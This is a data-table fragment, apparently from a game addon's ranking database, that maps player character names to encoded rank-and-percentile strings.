["Altruism"] = "ET:253/79%EB:545/90%RM:679/73%",
["Canofheals"] = "CT:139/15%UB:159/39%UM:120/34%",
["Huaibaobao"] = "UT:88/34%RB:429/60%RM:481/56%",
["Islowthings"] = "CB:153/19%UM:298/36%",
["Juicerr"] = "CT:60/24%RB:537/68%RM:449/66%",
["Leilastrasza"] = "UB:323/40%RM:658/70%",
["Xiaojier"] = "ET:568/75%EB:600/79%RM:569/61%",
["Envigunner"] = "UB:335/45%UM:322/36%",
["Sneakyben"] = "RM:646/69%",
["Gothangel"] = "CM:241/24%",
["Synia"] = "LB:727/96%EM:756/90%",
["Chuunen"] = "CB:59/6%UM:465/49%",
["Frosttwo"] = "EB:633/83%RM:644/71%",
["Ihateubrs"] = "UB:207/42%CM:48/10%",
["Frostone"] = "EB:678/88%EM:739/80%",
["Choonin"] = "CB:79/19%EM:723/76%",
["Itsexploit"] = "LB:718/95%LM:920/95%",
["Warfair"] = "CM:187/21%",
["Barrs"] = "UM:403/47%",
["Hierie"] = "CM:166/20%",
["Storex"] = "RM:507/56%",
["Harypothead"] = "EM:434/83%",
["Epicmaria"] = "RT:430/58%RB:536/73%RM:606/66%",
["Rhaegall"] = "UM:265/32%",
["Zimzor"] = "UT:61/25%UB:362/42%RM:488/51%",
["Tripe"] = "UM:281/33%",
["Oakeydokey"] = "UB:178/37%EM:562/79%",
["Nelordy"] = "CM:136/19%",
["Azzel"] = "CB:169/19%UM:284/29%",
["Vipifur"] = "UB:208/27%UM:308/37%",
["Yazyap"] = "UM:483/49%",
["Poonhunta"] = "CT:34/9%RB:397/54%RM:611/67%",
["Ostriveogg"] = "CT:65/24%UB:361/49%RM:240/59%",
["Aminge"] = "RT:168/61%RB:545/74%EM:410/77%",
["Bunnyroll"] = "UM:87/33%",
["Meicha"] = "UT:231/31%RB:448/61%UM:107/31%",
["Aimuti"] = "RB:428/55%RM:199/69%",
["Neveralive"] = "CM:47/17%",
["Fbot"] = "CM:53/3%",
["Dywub"] = "RM:398/74%",
["Franksmith"] = "CM:11/4%",
["Eneldi"] = "CT:76/22%CB:100/10%EM:822/89%",
["Huklhjn"] = "CM:171/23%",
["Probed"] = "CM:71/10%",
["Biu"] = "CB:200/22%UM:174/45%",
["Boxtil"] = "UT:124/47%RB:491/65%EM:862/89%",
["Pyropatt"] = "UM:230/32%",
["Pluko"] = "RT:417/68%LB:749/96%LM:912/95%",
["Nightrous"] = "CB:185/24%RM:374/74%",
["Valliere"] = "ET:283/84%LB:773/98%LM:942/97%",
["Kronicman"] = "ET:707/94%LB:731/96%LM:927/98%",
["Kylö"] = "RB:544/73%RM:590/61%",
["Dehydrate"] = "EB:590/83%EM:406/77%",
["Midgetfarmer"] = "UB:256/34%RM:506/59%",
["Nightelfdave"] = "UM:346/39%",
["Shootamgavin"] = "CB:95/11%EM:712/75%",
["Frosthurtz"] = "UB:252/34%CM:166/22%",
["Exhaust"] = "RB:403/55%RM:568/58%",
["Pinkjin"] = "UT:103/37%RB:304/66%EM:741/77%",
["Keyturn"] = "RT:205/70%EB:614/85%EM:725/78%",
["Yeezyboost"] = "UT:125/47%RB:293/66%EM:760/81%",
["Dupah"] = "UM:124/35%",
["Daquan"] = "RT:505/68%LB:758/95%EM:598/88%",
["Getstingy"] = "CM:18/3%",
["Atimarok"] = "UM:79/28%",
["Meekinz"] = "UM:136/37%",
["Azwraithcre"] = "RM:191/53%",
["Hellkathelly"] = "ET:565/75%EB:624/81%RM:242/57%",
["Rantrick"] = "RB:526/67%RM:380/71%",
["Frogg"] = "CT:27/5%CB:36/3%RM:258/60%",
["Voisty"] = "UM:76/30%",
["Bapak"] = "CB:98/13%CM:33/11%",
["Çøzÿ"] = "RT:211/69%EB:654/85%EM:651/91%",
["Mosensummon"] = "RM:275/61%",
["Bispally"] = "RM:559/64%",
["Bangbrothers"] = "RM:664/71%",
["Beezle"] = "EB:660/85%EM:763/81%",
["Seriousbsns"] = "LB:769/96%LM:972/98%",
["Shiftm"] = "UM:356/37%",
["Ekanight"] = "EB:727/91%EM:894/92%",
["Onebuttondps"] = "UB:325/45%EM:774/83%",
["Bjay"] = "CT:56/4%EM:893/94%",
["Gosmoke"] = "CM:227/23%",
["Guavá"] = "CB:183/23%CM:176/21%",
["Dmitriy"] = "EB:441/84%RM:760/74%",
["Knooblz"] = "UB:245/32%UM:429/49%",
["Joanofarcane"] = "EB:726/93%LM:934/95%",
["Holyherb"] = "RT:188/74%UB:46/35%RM:417/71%",
["Sinnerx"] = "UB:220/28%RM:483/53%",
["Trollrolled"] = "RT:197/68%EB:618/80%EM:823/85%",
["Recursiøn"] = "CM:97/11%",
["Némó"] = "UT:262/39%RB:437/58%RM:391/74%",
["Socio"] = "UB:363/47%RM:387/61%",
["Ritaa"] = "CB:78/9%UM:110/37%",
["Rtree"] = "RM:233/60%",
["Dair"] = "RM:632/69%",
["Abramss"] = "RB:370/50%RM:681/73%",
["Dashzheng"] = "CM:162/22%",
["Megahog"] = "RM:545/62%",
["Practice"] = "CB:87/24%UM:431/48%",
["Zejong"] = "ET:330/91%EB:684/93%EM:839/93%",
["Chiralium"] = "CM:129/18%",
["Lftankimdps"] = "RM:499/57%",
["Gaatsby"] = "RB:524/70%RM:540/74%",
["Dabqueenz"] = "CT:120/13%CB:53/9%RM:415/65%",
["Sort"] = "CB:126/15%RM:654/68%",
["Jaindoe"] = "UM:402/48%",
["Thebigtime"] = "RB:508/72%EM:779/87%",
["Tarrousai"] = "CM:154/20%",
["Crunchyberry"] = "CM:188/23%",
["Natapult"] = "RM:565/67%",
["Marlak"] = "UM:125/36%",
["Bloodfyah"] = "CT:15/8%UB:296/35%RM:625/70%",
["Bullma"] = "CM:44/16%",
["Trollinda"] = "CM:33/13%",
["Dexia"] = "RM:229/62%",
["Griefy"] = "RB:354/72%EM:710/75%",
["Knardpup"] = "CT:11/9%CB:171/21%CM:158/15%",
["Rikard"] = "CT:117/20%RB:403/53%RM:329/68%",
["Shehuntscats"] = "UT:293/39%EB:667/86%EM:478/82%",
["Flawlessness"] = "CB:116/15%EM:390/80%",
["Cynaria"] = "CM:61/21%",
["Elocinanmulo"] = "CT:26/9%CB:100/10%UM:133/39%",
["Ryancas"] = "RM:233/62%",
["Mopwasbetter"] = "RM:312/66%",
["Alphamoo"] = "UB:100/36%RM:515/68%",
["Falic"] = "UB:232/29%UM:120/42%",
["Chik"] = "UM:111/32%",
["Ghul"] = "UB:298/39%EM:469/78%",
["Firehazard"] = "ET:431/94%EB:499/91%EM:847/89%",
["Crowley"] = "ET:443/94%EB:701/89%EM:821/85%",
["Valkrie"] = "ET:321/89%EB:612/86%EM:424/87%",
["Drksinnister"] = "UT:59/27%CB:186/24%EM:338/75%",
["Pq"] = "LT:771/98%LB:751/98%LM:950/98%",
["Dredlow"] = "RT:188/65%EB:575/80%EM:505/87%",
["Volde"] = "LT:546/97%LB:756/96%LM:943/97%",
["Fumptrucker"] = "ET:341/89%LB:648/96%EM:877/91%",
["Shadowcaster"] = "ET:464/94%EB:550/90%EM:903/93%",
["Zaboomamoo"] = "LT:483/96%LB:590/95%EM:866/94%",
["Eeh"] = "LT:748/95%LB:753/95%SM:994/99%",
["Chillco"] = "ET:372/90%EB:652/84%EM:868/89%",
["Stinkysinman"] = "ET:271/82%RB:459/60%RM:249/55%",
["Simon"] = "EB:700/93%LM:966/98%",
["Overidemusic"] = "ET:363/91%RB:439/58%RM:613/67%",
["Bòbyshmurda"] = "LT:517/96%RB:415/56%UM:314/37%",
["Nezzako"] = "CT:14/4%CM:17/5%",
["Puddingpoop"] = "RB:474/65%UM:394/42%",
["Zeítgeist"] = "ET:322/88%EB:706/90%EM:812/84%",
["Karnex"] = "ET:552/75%EB:638/81%EM:896/92%",
["Valek"] = "LT:431/95%EB:582/77%EM:799/85%",
["Bibitura"] = "CM:17/0%",
["Evilsqul"] = "RT:548/73%EB:691/88%RM:691/74%",
["Amyli"] = "LT:452/95%UB:340/46%RM:511/57%",
["Berbeda"] = "CT:33/13%CB:118/12%UM:233/27%",
["Xiaowei"] = "CT:51/23%UB:316/43%RM:188/51%",
["Szìx"] = "RT:434/60%RB:542/72%RM:654/73%",
["Maxismyname"] = "CT:35/10%CB:69/17%CM:156/14%",
["Trapbot"] = "CT:49/5%RB:478/63%EM:779/81%",
["Picklo"] = "RM:588/65%",
["Ekashi"] = "RM:624/66%",
["Yangon"] = "RB:392/53%RM:590/63%",
["Xinoh"] = "ET:261/78%RB:555/72%RM:678/70%",
["Momoo"] = "RT:541/72%UB:343/43%RM:545/56%",
["Tssbbank"] = "UT:212/27%RB:218/51%UM:368/38%",
["Maartje"] = "CB:56/5%RM:620/68%",
["Hasslehoof"] = "RT:177/62%EB:538/79%EM:826/92%",
["Bossaconk"] = "UB:139/38%RM:559/66%",
["Jàmezzs"] = "UT:106/41%CB:87/23%UM:128/40%",
["Gglcc"] = "ET:573/77%EB:655/84%RM:625/70%",
["Binnello"] = "CM:2/0%",
["Schenkop"] = "CM:41/5%",
["Primeval"] = "RT:234/72%RB:556/74%RM:377/72%",
["Samagaha"] = "UM:239/30%",
["Compton"] = "UB:360/45%RM:615/58%",
["Nordoyle"] = "ET:259/79%RB:418/58%EM:659/76%",
["Zimmy"] = "CB:39/2%",
["Cornwallis"] = "CT:27/1%RB:412/53%UM:349/35%",
["Espure"] = "UB:153/36%UM:316/36%",
["Fawn"] = "RB:497/69%EM:680/75%",
["Gnomenstrate"] = "CM:183/18%",
["Erza"] = "UM:414/45%",
["Kads"] = "RM:550/59%",
["Izl"] = "UB:263/30%RM:191/50%",
["Velkan"] = "CB:12/1%",
["Olbrowneye"] = "CT:22/3%RB:397/53%CM:56/6%",
["Gaaro"] = "CT:58/23%CB:69/7%",
["Zerømind"] = "UT:74/28%RB:275/66%RM:236/58%",
["Highwày"] = "RB:425/57%UM:481/49%",
["Nightcat"] = "EB:607/77%EM:769/80%",
["Ayafury"] = "CB:83/20%RM:529/59%",
["Ritssyn"] = "ET:710/91%EB:576/92%RM:569/61%",
["Cakeclappin"] = "UB:277/36%RM:571/61%",
["Shotglass"] = "EB:738/93%EM:915/93%",
["Foodfarmer"] = "EB:689/92%EM:808/87%",
["Laan"] = "EB:700/93%EM:845/92%",
["Demontime"] = "CB:164/20%UM:304/31%",
["Kittykappa"] = "LB:713/95%EM:864/91%",
["Urgency"] = "RM:597/66%",
["Ruimei"] = "ET:640/84%RB:494/69%RM:580/64%",
["Chengxuyuan"] = "RT:517/70%EB:655/84%EM:753/79%",
["Pilipalapoom"] = "RB:510/65%RM:692/74%",
["Formaas"] = "RB:465/62%RM:641/70%",
["Graves"] = "RT:217/70%RB:322/68%EM:489/79%",
["Nengalone"] = "UM:196/29%",
["Sukro"] = "CT:55/19%RB:467/64%RM:552/61%",
["Sabretoofer"] = "EB:657/84%EM:837/86%",
["Ishildaya"] = "CM:30/1%",
["Aktinos"] = "EB:578/80%EM:765/81%",
["Wtfx"] = "RM:524/57%",
["Breakout"] = "EB:662/86%EM:830/88%",
["Shadowhero"] = "CT:111/19%RM:672/69%",
["Biobreak"] = "UM:233/32%",
["Demonborn"] = "CB:62/7%UM:104/35%",
["Fightfury"] = "RB:390/65%RM:394/61%",
["Achaeans"] = "CT:27/10%CB:33/5%UM:245/29%",
["Lionsins"] = "CT:37/7%RM:434/51%",
["Ironfist"] = "EB:363/79%RM:539/73%",
["Dezram"] = "RB:350/73%EM:717/77%",
["Bennetta"] = "CB:30/3%",
["Spronzo"] = "ET:589/78%LB:673/98%LM:904/96%",
["Cerealez"] = "RB:477/67%EM:698/80%",
["Eaf"] = "RB:204/59%EM:552/79%",
["Valakadyn"] = "EB:433/82%EM:754/80%",
["Mercenarie"] = "RT:210/70%RB:291/63%UM:451/47%",
["Blinkerbell"] = "CB:1/0%CM:66/24%",
["Lenyaa"] = "CB:3/0%CM:25/0%",
["Orreo"] = "CB:33/2%",
["Arethos"] = "RT:185/65%EB:648/83%RM:636/71%",
["Neighborhood"] = "UB:257/34%RM:632/65%",
["Voidrip"] = "UT:222/29%EB:608/80%CM:130/18%",
["Bingham"] = "CT:32/3%CB:34/3%CM:15/2%",
["Tethesis"] = "RT:400/64%EB:580/82%EM:629/80%",
["Setiawan"] = "RB:546/74%RM:637/70%",
["Shackagawea"] = "RT:445/58%EB:607/85%RM:171/51%",
["Calles"] = "UT:140/49%EB:430/80%RM:499/56%",
["Nabbie"] = "CM:113/16%",
["Invoke"] = "RM:489/57%",
["Gabtab"] = "UT:281/36%EB:438/86%RM:497/54%",
["Fanguar"] = "RB:434/60%EM:738/80%",
["Calífax"] = "LB:765/96%EM:917/93%",
["Wizlagertha"] = "UM:72/27%",
["Manahunt"] = "UB:313/39%RM:489/51%",
["Quikness"] = "RB:353/72%EM:551/85%",
["Pikape"] = "RT:204/69%EB:700/90%EM:846/89%",
["Nefys"] = "UB:274/36%RM:470/51%",
["Herpsabop"] = "EB:658/85%EM:713/75%",
["Orcunter"] = "EB:677/87%EM:748/79%",
["Casteron"] = "RB:517/69%EM:686/75%",
["Monieshot"] = "EB:602/80%RM:571/61%",
["Fátê"] = "RB:555/71%RM:575/61%",
["Juliarose"] = "RB:457/60%EM:804/85%",
["Cardrino"] = "EB:724/92%EM:790/82%",
["Fäte"] = "LT:771/98%UB:184/38%RM:470/68%",
["Rengar"] = "RT:364/50%RB:292/63%RM:695/74%",
["Keldior"] = "LT:459/95%EB:655/84%EM:714/78%",
["Mitchel"] = "CT:51/21%CB:36/3%",
["Coolcatz"] = "UM:227/27%",
["Spottedcow"] = "UT:117/45%EB:703/89%EM:817/85%",
["Ginofu"] = "RB:245/56%RM:479/54%",
["Docness"] = "ET:282/81%EB:561/75%RM:316/66%",
["Noideymage"] = "ET:575/76%EB:595/82%EM:403/81%",
["Shadowmamba"] = "EB:558/75%RM:348/71%",
["Kans"] = "UB:129/33%UM:95/33%",
["Rumoured"] = "UB:161/46%RM:207/64%",
["Happydwarf"] = "ET:681/88%EB:682/87%EM:706/76%",
["Azzer"] = "UB:317/43%UM:319/31%",
["Voldmort"] = "ET:343/89%EB:635/83%EM:890/92%",
["Jefexe"] = "CB:115/14%UM:257/26%",
["Crump"] = "CB:29/3%UM:455/47%",
["Oxaran"] = "UM:109/35%",
["Sícklecell"] = "UB:355/48%UM:406/45%",
["Kode"] = "UB:216/29%UM:139/46%",
["Causation"] = "UB:219/27%RM:596/66%",
["Lemmee"] = "CB:81/23%",
["Sozzo"] = "RB:351/65%EM:428/80%",
["Liltots"] = "UT:266/35%EB:425/80%UM:308/36%",
["Shimoryoshi"] = "UT:112/43%EB:484/87%EM:541/85%",
["Dontpokeme"] = "EB:639/82%RM:712/74%",
["Catspjs"] = "EM:843/88%",
["Bloodsoaked"] = "RM:462/53%",
["Zuldc"] = "CM:83/12%",
["Xdominion"] = "CB:33/2%UM:324/38%",
["Rüm"] = "UM:107/37%",
["Malzahard"] = "EB:536/89%EM:570/86%",
["Grubnik"] = "CM:57/18%",
["Bewlerr"] = "RB:433/57%EM:926/92%",
["Jxmes"] = "CB:30/3%RM:307/63%",
["Cøcoloco"] = "RM:622/73%",
["Illadelph"] = "RT:186/66%EB:670/87%RM:686/73%",
["Qitian"] = "RT:140/59%EB:512/92%EM:877/94%",
["Jamesswith"] = "CT:29/7%CB:111/14%RM:171/52%",
["Bluezz"] = "RT:157/58%EB:634/83%EM:800/83%",
["Prîncepoon"] = "UT:263/35%RB:550/72%EM:789/82%",
["Weiieii"] = "EB:401/83%RM:595/70%",
["Starshaper"] = "UM:326/37%",
["Söulstice"] = "RM:547/61%",
["Bemona"] = "CT:32/1%CB:73/6%RM:559/65%",
["Liuda"] = "CT:140/15%RB:422/60%UM:180/49%",
["Diorlol"] = "UB:129/32%CM:44/13%",
["Andiamo"] = "CB:92/22%EM:896/93%",
["Zabuza"] = "RM:239/57%",
["Harboce"] = "UM:370/44%",
["Alamaya"] = "CM:35/3%",
["Hotcheetoz"] = "RT:502/66%EB:606/79%RM:535/58%",
["Catsoup"] = "RT:566/74%EB:631/82%RM:680/72%",
["Gucciframes"] = "CB:161/20%RM:446/50%",
["Kotofche"] = "EB:685/86%EM:798/83%",
["Aurris"] = "UT:121/46%RB:454/59%EM:737/78%",
["Theelf"] = "EM:800/92%",
["Hercules"] = "UB:349/40%LM:950/95%",
["Riko"] = "RM:500/56%",
["Bevns"] = "RM:696/71%",
["Gnomerr"] = "CT:158/20%RB:437/59%UM:163/46%",
["Bootysnaxx"] = "CT:79/10%UB:130/34%UM:160/45%",
["Dotsummer"] = "UB:264/35%UM:89/31%",
["Sonchaeyoung"] = "CM:41/5%",
["Sälly"] = "UT:157/49%EB:466/88%RM:548/74%",
["Amalla"] = "RB:526/71%EM:727/78%",
["Alanbrooke"] = "CM:131/18%",
["Knylz"] = "RB:434/59%RM:576/61%",
["Mangohunter"] = "EB:700/89%EM:872/89%",
["Theshyy"] = "RB:532/74%RM:331/74%",
["Gunnea"] = "UB:308/41%UM:199/29%",
["Hmg"] = "CB:35/6%RM:222/61%",
["Posionsix"] = "ET:652/85%EB:625/81%EM:800/83%",
["Woshisb"] = "RB:576/74%EM:706/75%",
["Schlotzskys"] = "ET:261/80%RB:326/68%EM:779/82%",
["Hotpicnic"] = "RB:564/74%EM:823/85%",
["Elenel"] = "LM:930/95%",
["Littlemimi"] = "RB:398/54%UM:134/41%",
["Huangshiren"] = "CB:175/18%UM:299/34%",
["Missyuu"] = "RM:439/51%",
["Icymu"] = "CT:0/4%CB:30/1%RM:476/52%",
["Bitcoìn"] = "RM:590/69%",
["Brazy"] = "UB:260/31%RM:657/70%",
["Nevercrits"] = "EM:744/84%",
["Gruke"] = "CT:58/23%UB:337/41%RM:354/66%",
["Thickhead"] = "RB:475/68%RM:554/61%",
["Japadog"] = "RB:247/56%RM:210/53%",
["Hotcake"] = "RT:166/60%LB:676/97%LM:835/97%",
["Eeq"] = "CB:156/18%RM:630/70%",
["Tekai"] = "RT:221/73%LB:688/97%EM:655/91%",
["Sodypop"] = "RM:677/72%",
["Dieselpriest"] = "CB:81/18%RM:389/74%",
["Imposition"] = "CB:64/7%CM:139/18%",
["Raezer"] = "CM:129/12%",
["Bytes"] = "CM:192/20%",
["Ramshot"] = "RM:543/60%",
["Gonepriority"] = "UM:141/43%",
["Baidandan"] = "CM:30/2%",
["Ssamjangg"] = "UT:113/41%UB:260/34%CM:234/24%",
["Melasyn"] = "CB:99/24%RM:428/74%",
["Murdèrface"] = "CB:36/3%UM:146/39%",
["Meanwhile"] = "CM:100/9%",
["Gumbutt"] = "UB:226/29%CM:62/22%",
["Elzae"] = "CT:175/20%RB:495/68%RM:608/67%",
["Santazhelper"] = "CB:83/9%",
["Miranda"] = "LB:770/97%EM:785/84%",
["Elchy"] = "CB:171/21%UM:270/32%",
["Nibbling"] = "EB:747/94%EM:805/83%",
["Noodlebow"] = "CM:161/19%",
["Thejokers"] = "UB:245/31%RM:515/56%",
["Qiraji"] = "UB:138/30%CM:43/8%",
["Clementine"] = "CM:37/4%",
["Nadmor"] = "RM:390/63%",
["Winters"] = "RB:502/66%RM:598/64%",
["Scotchwins"] = "UB:345/44%UM:342/34%",
["Chancey"] = "UM:153/49%",
["Newjackle"] = "UT:108/42%CB:109/13%UM:118/38%",
["Philphantom"] = "EB:555/75%RM:570/63%",
["Zendril"] = "CM:28/1%",
["Multiforus"] = "CM:107/12%",
["Sojra"] = "UB:282/36%EM:723/77%",
["Tankerup"] = "ET:265/83%RB:306/73%EM:671/83%",
["Gorgom"] = "CM:5/0%",
["Sonjaya"] = "UT:104/47%CB:66/17%EM:457/85%",
["Myles"] = "ET:286/88%RB:302/70%EM:494/87%",
["Norgana"] = "UT:123/44%CB:52/11%UM:151/40%",
["Rentubaiqi"] = "RB:435/57%RM:583/66%",
["Cherryblosso"] = "CB:39/8%RM:214/55%",
["Yasuoisfalth"] = "CT:29/6%UB:199/48%EM:541/84%",
["Floseason"] = "UM:85/32%",
["Decai"] = "CM:33/11%",
["Mightyrhinz"] = "RM:218/56%",
["Deniabay"] = "CM:52/21%",
["Canislupus"] = "UM:83/32%",
["Sparkledad"] = "UT:212/28%EB:694/88%EM:769/80%",
["Dunnbow"] = "CT:114/14%RB:556/73%RM:751/73%",
["Pyoopyoopyoo"] = "UB:142/38%RM:622/66%",
["Skullze"] = "ET:729/93%EB:729/93%LM:893/95%",
["Leopards"] = "CB:41/3%CM:58/23%",
["Kurwaa"] = "EB:641/81%RM:664/71%",
["Thurid"] = "RM:479/57%",
["Deathwalker"] = "RB:382/52%EM:403/75%",
["Infamii"] = "UM:458/46%",
["Kezzie"] = "CB:27/1%CM:162/20%",
["Jokerz"] = "UB:238/32%CM:206/21%",
["Irlalcoholic"] = "CT:181/20%RB:218/50%RM:434/50%",
["Azathot"] = "EB:634/82%RM:675/70%",
["Inosservato"] = "UB:390/49%RM:578/62%",
["Yulebrenner"] = "UM:312/37%",
["Apathee"] = "UM:97/32%",
["Givs"] = "RM:471/51%",
["Ifriit"] = "RB:402/53%RM:485/56%",
["Shyeah"] = "RM:241/60%",
["Krosus"] = "RB:531/68%RM:549/61%",
["Sodawater"] = "UB:357/46%EM:834/86%",
["Triscutie"] = "UB:267/34%EM:706/77%",
["Kdogz"] = "LB:762/96%EM:920/94%",
["Yvvii"] = "UB:163/42%RM:702/67%",
["Aoirinn"] = "CT:31/7%CB:66/18%UM:93/34%",
["Pooc"] = "UB:93/25%UM:266/32%",
["Hotnspicy"] = "CB:30/2%CM:39/12%",
["Healurbæ"] = "CT:36/2%RM:225/54%",
["Petmyfurry"] = "RT:146/70%EB:561/87%EM:360/82%",
["Wormhole"] = "CT:56/19%EB:617/81%EM:764/82%",
["Ordinarys"] = "UM:96/35%",
["Chabuk"] = "CM:81/24%",
["Duolly"] = "CM:46/17%",
["Obq"] = "CT:58/6%CB:195/24%CM:47/15%",
["Ropzr"] = "CB:47/12%RM:258/62%",
["Nightkids"] = "CM:35/9%",
["Janer"] = "RM:172/53%",
["Chaylie"] = "UB:163/47%UM:32/35%",
["Eroslon"] = "UM:287/35%",
["Shamefull"] = "RM:408/65%",
["Khentoog"] = "EB:597/78%EM:638/90%",
["Chasings"] = "CB:26/0%UM:421/48%",
["Thesuperheal"] = "CT:101/10%UB:341/47%RM:581/68%",
["Dragooz"] = "EM:818/88%",
["Cabernet"] = "EB:718/92%EM:764/78%",
["Darkvega"] = "UT:240/33%EB:488/88%EM:780/81%",
["Neggö"] = "CM:34/4%",
["Schlubnheizr"] = "CT:48/15%UM:368/42%",
["Sorceress"] = "UB:324/46%UM:150/49%",
["Direhowl"] = "CM:49/17%",
["Gladre"] = "CM:5/2%",
["Weinersniff"] = "UM:139/41%",
["Eyesore"] = "CM:2/0%",
["Forthesix"] = "EB:592/81%LM:943/97%",
["Ktlove"] = "ET:630/83%RB:580/74%EM:762/82%",
["Villaresto"] = "RM:601/71%",
["Getrack"] = "CM:102/14%",
["Thoronn"] = "RB:321/53%EM:677/83%",
["Luckyduck"] = "RB:498/70%RM:304/71%",
["Graza"] = "RB:313/68%RM:352/71%",
["Undage"] = "CB:35/2%EM:365/78%",
["Rivalree"] = "EB:578/76%EM:739/78%",
["Henryrearden"] = "EB:598/85%EM:793/89%",
["Boonaris"] = "CM:42/3%",
["Khao"] = "CB:169/20%RM:588/65%",
["Furnicate"] = "UB:190/48%RM:216/56%",
["Fgk"] = "CB:182/23%RM:538/60%",
["Krysis"] = "RT:191/71%EB:525/76%RM:253/55%",
["Pinkyfour"] = "CM:214/21%",
["Phirl"] = "UM:226/25%",
["Adamantia"] = "EM:773/81%",
["Nautick"] = "RM:504/59%",
["Mangolicious"] = "RM:442/68%",
["Dirtygaspump"] = "CB:75/9%RM:594/64%",
["Missmaces"] = "UB:184/44%CM:36/10%",
["Autoshotlol"] = "EM:698/75%",
["Funion"] = "RB:482/68%UM:323/34%",
["Brickshaw"] = "EB:687/86%EM:883/91%",
["Baresace"] = "CT:0/5%RM:172/53%",
["Szero"] = "CB:71/19%",
["Smalboifresh"] = "RB:411/54%RM:501/59%",
["Kek"] = "EB:603/80%EM:784/83%",
["Zhangbabaww"] = "UM:70/27%",
["Shahvee"] = "RB:247/63%EM:561/79%",
["Osha"] = "RM:481/57%",
["Chf"] = "EB:646/84%EM:785/84%",
["Hogquan"] = "RM:206/50%",
["Chadderbox"] = "UT:79/31%CB:115/12%UM:391/46%",
["Flipcup"] = "UM:397/42%",
["Roydukem"] = "LT:412/95%EB:679/91%EM:808/90%",
["Cleymoos"] = "CM:23/12%",
["Sydmead"] = "CM:21/8%",
["Surprisepp"] = "UM:100/38%",
["Ypa"] = "CM:30/8%",
["Coolice"] = "CM:48/18%",
["Umaj"] = "RB:513/69%UM:251/30%",
["Ottowest"] = "CT:37/10%CB:64/7%UM:133/36%",
["Healsters"] = "UM:393/47%",
["Revv"] = "RB:427/55%RM:705/73%",
["Thotndot"] = "CB:161/21%UM:103/35%",
["Response"] = "CM:55/6%",
["Phobee"] = "UM:127/39%",
["Sapalt"] = "RM:584/64%",
["Alicetwo"] = "UM:74/29%",
["Wceng"] = "UB:334/46%RM:502/59%",
["Wargasmer"] = "RB:472/62%RM:605/64%",
["Scandy"] = "EB:654/85%EM:745/78%",
["Xiongge"] = "RT:487/66%RB:498/68%RM:280/64%",
["Kidneypopper"] = "EB:490/87%RM:761/73%",
["Vect"] = "CB:9/0%CM:61/19%",
["Anax"] = "CB:49/4%UM:235/28%",
["Twizzletots"] = "CM:149/15%",
["Forewarn"] = "EB:637/82%EM:633/90%",
["Puds"] = "EB:616/80%RM:599/66%",
["Rengi"] = "CM:57/4%",
["Avoca"] = "UT:230/29%CB:139/17%UM:97/30%",
["Marloe"] = "CM:67/10%",
["Sikasep"] = "CB:92/10%UM:276/28%",
["Tillaz"] = "CB:83/7%CM:172/15%",
["Xue"] = "CT:0/5%UM:384/46%",
["Hopstar"] = "UT:276/38%RB:306/68%UM:306/34%",
["Nachocheebz"] = "RB:199/63%UM:152/49%",
["Seldomz"] = "CT:34/1%EB:542/75%RM:571/64%",
["Vertigan"] = "RT:183/62%RB:548/70%EM:776/81%",
["Makeusaywtf"] = "EB:661/84%LM:965/97%",
["Scorched"] = "EB:573/76%EM:833/88%",
["Friendpal"] = "ET:329/88%EB:670/86%EM:871/89%",
["Shandras"] = "CT:64/23%CB:38/3%",
["Bonecrusha"] = "UT:83/33%EB:627/79%EM:711/75%",
["Dertee"] = "ET:730/93%LB:761/97%RM:717/73%",
["Captrix"] = "UM:420/44%",
["Vinegary"] = "CB:172/22%RM:756/72%",
["Catbearboom"] = "CT:1/0%RB:236/58%",
["Preset"] = "RT:189/61%EB:611/85%UM:381/46%",
["Worthashot"] = "CT:3/3%CB:66/7%RM:583/62%",
["Visherman"] = "UB:271/35%RM:589/65%",
["Dieyoung"] = "CB:25/0%UM:416/47%",
["Jerrytard"] = "CM:26/0%",
["Zem"] = "RT:523/71%UB:173/43%EM:815/85%",
["Clockzyofc"] = "RM:575/66%",
["Fam"] = "ET:274/82%EB:573/75%EM:869/89%",
["Dakiandotta"] = "UT:105/38%RB:512/67%RM:624/65%",
["Cutiemcbooty"] = "RT:182/64%RB:492/70%EM:660/77%",
["Jahkira"] = "RT:170/61%EB:588/75%EM:707/75%",
["Zhelper"] = "CT:42/19%RB:512/72%EM:534/89%",
["Hoobie"] = "RT:204/70%EB:615/81%RM:672/73%",
["Outraged"] = "ET:145/79%EB:644/90%EM:820/92%",
["Dotjpg"] = "EB:659/83%LM:963/97%",
["Nolocks"] = "RM:525/54%",
["Arrby"] = "ET:251/83%EB:565/85%EM:699/86%",
["Yoloharry"] = "ET:701/94%LB:716/96%LM:887/97%",
["Wrecksall"] = "CT:164/21%RB:394/51%RM:653/69%",
["Layerplz"] = "CT:0/4%EB:599/79%EM:791/84%",
["Demihunter"] = "RB:297/66%RM:635/68%",
["Addik"] = "RB:300/66%RM:652/69%",
["Tyronebigms"] = "RB:429/55%EM:833/83%",
["Lucinà"] = "EB:668/86%EM:825/87%",
["Infernoone"] = "RB:568/74%UM:466/47%",
["Mippo"] = "RB:454/62%",
["Hateplöw"] = "ET:708/91%LB:755/95%EM:853/88%",
["Dwyna"] = "EB:544/81%EM:827/92%",
["Shreak"] = "UB:281/37%UM:444/47%",
["Answers"] = "UB:270/37%CM:40/14%",
["Milker"] = "EB:603/79%EM:862/86%",
["Allowit"] = "UB:235/32%RM:198/51%",
["Bigsausage"] = "ET:605/80%RB:476/74%EM:856/90%",
["Frylok"] = "RT:421/56%EB:600/79%EM:731/78%",
["Milkbones"] = "CB:67/16%UM:138/27%",
["Fengshui"] = "ET:681/84%RB:298/69%EM:892/93%",
["Sofs"] = "UB:135/46%EM:677/83%",
["Ebonchill"] = "CT:30/7%RB:314/73%RM:605/64%",
["Center"] = "EB:713/90%LM:976/98%",
["Artemizia"] = "RT:358/50%EB:663/86%EM:842/87%",
["Ruhan"] = "CT:64/21%UB:185/44%",
["Aegar"] = "RT:122/52%EB:553/81%EM:662/82%",
["Trickone"] = "EM:696/76%",
["Bichsap"] = "ET:248/77%UB:306/41%EM:762/80%",
["Cheaddle"] = "UT:261/38%EB:661/89%EM:722/82%",
["Vuljiin"] = "RB:580/74%RM:670/71%",
["Philipbanks"] = "UB:382/48%RM:544/58%",
["Lunarflower"] = "UB:232/48%EM:646/94%",
["Kiakari"] = "CT:142/18%RB:498/64%RM:663/71%",
["Wufeiwu"] = "CB:62/11%",
["Gluebo"] = "UT:66/30%UB:250/34%RM:263/66%",
["Yojo"] = "RB:382/51%EM:906/94%",
["Fashix"] = "UB:165/44%UM:330/39%",
["Tom"] = "RT:462/62%LB:740/97%LM:937/97%",
["Xgd"] = "RT:413/57%EB:550/91%RM:629/69%",
